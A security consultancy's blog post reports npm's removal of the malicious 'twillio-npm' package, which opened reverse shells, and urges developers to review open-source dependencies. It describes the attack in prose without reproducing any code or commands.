Open-Sourced Code Attacks Continue

Npm removed yet another malicious package from its open-sourced code library this week. It marks the fourth major takedown in three months for npm.

Two days ago, npm removed a malicious JavaScript library from their website. The code contained a malicious string for opening backdoors on programmers’ computers. This is the fourth major npm takedown in the last three months, and it’s unlikely to slow down now. Open-sourced code attacks might be here for awhile.

Previously, we discussed that all open-sourced code should be reviewed prior to use. This should have been an automatic process for programmers anyway, but as humans, we tend to be more trusting than not. Unfortunately, that paves the way for bad actors to get in and do damage. The latest package, named “twillio-npm,” was discovered by Sonatype, a company which monitors public package repositories as part of its DevOps services.

The Sonatype report says the library was published this past Friday on the npm website. It was discovered the same day and removed on Monday after the npm security team blacklisted the package. The library had a pretty short lifespan on the npm website, but still was downloaded more than 370 times. The package automatically included JavaScript projects that are built and managed via the npm command-line utility. It appears the reverse shell the package opens only worked on UNIX-based systems. 

From ZDNet, “Any computer that has this package installed or running should be considered fully compromised,” the npm security team said today, confirming Sonatype’s investigation. “All secrets and keys stored on that computer should be rotated immediately from a different computer,” the npm team added.

As stated above, this is the fourth major takedown of malicious packages on the npm library in the last three months. August saw a malicious npm removed. September saw four libraries removed. And, in the last two weeks, three more packages were removed. That’s a total of nine malicious libraries removed from npm in a very short amount of time.

Humans tend to trust other humans until given a reason not to. We’ve been warned that this could happen for years, and it’s actually surprising that it’s taken this long for this problem to arise. Open-source code sharing has been around for a long time, programmers often figure out new ways to write code or to automate something that previously wasn’t. They all work together to not only simplify the coding process, but to collaborate and come up with solutions together. 

Having a bad actor come inside their world should make programmers feel violated, although they shouldn’t be surprised either. But they should be incredibly angry and frustrated. This is a place they should be able to go to find a solution to a problem they have. They might find that solution, but now they know they might also import malicious code with that solution.

Open-sourced code should always be reviewed, whether it’s an npm library, GitHub or something/somewhere else. Before the last few months, most programmers would have laughed off the need to review open source package code. But now? Now it’s a much needed step in the process. 

This really goes to show that bad actors are everywhere. They will do whatever they can, whatever it takes to infiltrate a business and steal whatever information they can gain. This could be personal, private and sensitive information. It could be proprietary business information or intellectual property. It could be stealing compute, cryptomining or simply holding your business systems hostage until a ransom is paid. Whatever the method, one thing is for sure: Bad actors will do whatever it takes to get what they want, and anyone in the way better move or get run over.

Don’t be the next victim. Do an intense security review now, before 2021 starts and a new budget is in place. Make a plan to fix anything that needs fixed. Review code for unwanted strings. Review IAM controls to ensure least privilege. Review all cloud services to ensure proper use, that all services are actually being used and that you know what normal is and have alerts set around that. Review or scan your open source packages. If you don’t know how or want an outsider’s opinion to ensure nothing is missed, always hire an expert! Under the thumb of a pandemic, cybersecurity in 2020 is a major factor in business success. Don’t let your business fail because you missed an opportunity to fix a problem!

About the Author

Pieter VanIperen, Managing Partner of PWV Consultants, leads a boutique group of industry leaders and influencers from the digital tech, security and design industries that acts as trusted technical partners for many Fortune 500 companies, high-visibility startups, universities, defense agencies, and NGOs. He is a 20-year software engineering veteran, who founded or co-founder several companies. He acts as a trusted advisor and mentor to numerous early stage startups, and has held the titles of software and software security executive, consultant and professor. His expert consulting and advisory work spans several industries in finance, media, medical tech, and defense contracting. Has also authored the highly influential precursor HAZL (jADE) programming language.

Contact us

Contact Us About Anything

Need Project Savers, Tech Debt Wranglers, Bleeding Edge Pushers?

Please drop us a note let us know how we can help. If you need help in a crunch make sure to mark your note as Urgent. If we can't help you solve your tech problem, we will help you find someone who can.

1350 Avenue of the Americas, New York City, NY